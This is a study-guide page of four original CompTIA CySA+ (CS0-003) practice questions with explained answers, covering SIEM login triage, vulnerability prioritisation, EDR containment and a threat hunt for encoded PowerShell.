Browse CompTIA Certification Guides

CompTIA CS0-003 Sample Questions with Explanations

April 25, 2026

CompTIA CS0-003 sample questions with explanations, traps, topic labels, and IT Mastery route links.

On this page

These original sample questions are designed to help you check how the exam topics appear in decision-style prompts. They are not taken from the live exam.

Use these sample questions as a guided self-assessment for CompTIA CySA+ (CS0-003) topics such as SOC triage, SIEM correlation, vulnerability management, incident response, threat hunting, endpoint evidence, cloud logs, reporting, and control improvement. The prompts emphasize analyst workflow and risk prioritization.

Where these questions fit in the CS0-003 guide

The sample set below is part of the CompTIA CySA+ guide path:

CS0-003 analyst sample questions

Work through each prompt before opening the explanation. CySA+ questions usually reward evidence correlation, risk-based priority, safe containment, and clear reporting.

Question 1

Topic: Correlating a suspicious login

A SIEM alert flags impossible travel for a user with access to sensitive data. The user recently enrolled a new device, and there are several failed MFA attempts before a successful login. What should the analyst do first?

  • A. Close the alert because the user eventually completed MFA.
  • B. Correlate identity logs, MFA events, device details, source locations, token activity, and recent privilege changes to validate scope and confidence.
  • C. Reimage all servers because any login alert means full compromise.
  • D. Delete all authentication logs to protect user privacy.

Best answer: B

Explanation: CySA+ triage starts with correlation. The analyst needs identity, device, MFA, location, and privilege context before classifying the event.

Why the other choices are weaker:

  • A ignores suspicious failed attempts and device enrollment context.
  • C overreacts without evidence of host compromise.
  • D destroys investigation and audit evidence.

What this tests: SIEM triage, identity logs, MFA, impossible travel, alert validation, and scope.

Related topics: SIEM; Identity; MFA; Triage

Question 2

Topic: Risk-based vulnerability priority

A vulnerability queue contains a high CVSS finding on an internal test server and a medium CVSS finding on an internet-facing production API with exploit attempts in WAF logs. Which should be prioritized first?

  • A. The internal test server, because high CVSS always has highest priority.
  • B. Neither, because vulnerability scanners are never useful.
  • C. The internet-facing production API, because exposure and active exploit evidence can outweigh raw CVSS score alone.
  • D. The oldest ticket, regardless of exploitability or business impact.

Best answer: C

Explanation: CySA+ prioritization combines severity with exposure, exploitability, asset criticality, and observed activity.

Why the other choices are weaker:

  • A uses CVSS without business and threat context.
  • B discards useful vulnerability data.
  • D ignores current risk.

What this tests: Vulnerability management, exploitability, exposure, asset value, WAF evidence, and remediation priority.

Related topics: Vulnerability management; Risk; WAF logs; Prioritization

Question 3

Topic: Endpoint containment order

EDR reports suspicious process activity and outbound connections from one workstation. The host is used by an accounting employee and contains sensitive files. What is the strongest containment step?

  • A. Wipe the workstation immediately before collecting any evidence.
  • B. Tell the user to continue working until the next patch window.
  • C. Disable all security tools so the process can be observed without interference.
  • D. Isolate the workstation using approved EDR or network controls while preserving process, file, network, and timeline evidence.

Best answer: D

Explanation: Containment should limit harm and preserve investigation value. Isolation is stronger than wiping before scope and root cause are understood.

Why the other choices are weaker:

  • A can destroy evidence.
  • B leaves potential compromise active.
  • C weakens visibility and control.

What this tests: Incident response, EDR, containment, evidence preservation, and sensitive asset handling.

Related topics: Incident response; EDR; Containment; Evidence

Question 4

Topic: Threat hunting hypothesis

A threat hunt begins with the hypothesis that attackers may be using encoded PowerShell commands after phishing. Which data and query approach is strongest?

  • A. Search only firewall denies, because process execution is unrelated to threat hunting.
  • B. Ask users whether they remember clicking a link and stop there.
  • C. Search endpoint process telemetry for PowerShell command lines, parent processes, encoded flags, user context, and follow-on network connections.
  • D. Delete all PowerShell logs because encoded commands are hard to read.

Best answer: C

Explanation: Hypothesis-driven hunting starts with expected behavior and the data source most likely to show it. Process telemetry and command-line evidence match the stated technique.

Why the other choices are weaker:

  • A may be useful later but misses host process behavior.
  • B is weak evidence and does not validate the technique.
  • D destroys the hunting data source.

What this tests: Threat hunting, hypothesis, endpoint telemetry, process trees, command-line analysis, and follow-on activity.

Related topics: Threat hunting; PowerShell; Endpoint telemetry; Process analysis

Independent study note

Tech Exam Lexicon and IT Mastery are independent study tools. They are not affiliated with, endorsed by, or sponsored by CompTIA or any certification body.

Revised on Sunday, May 10, 2026
Study Plan
FAQ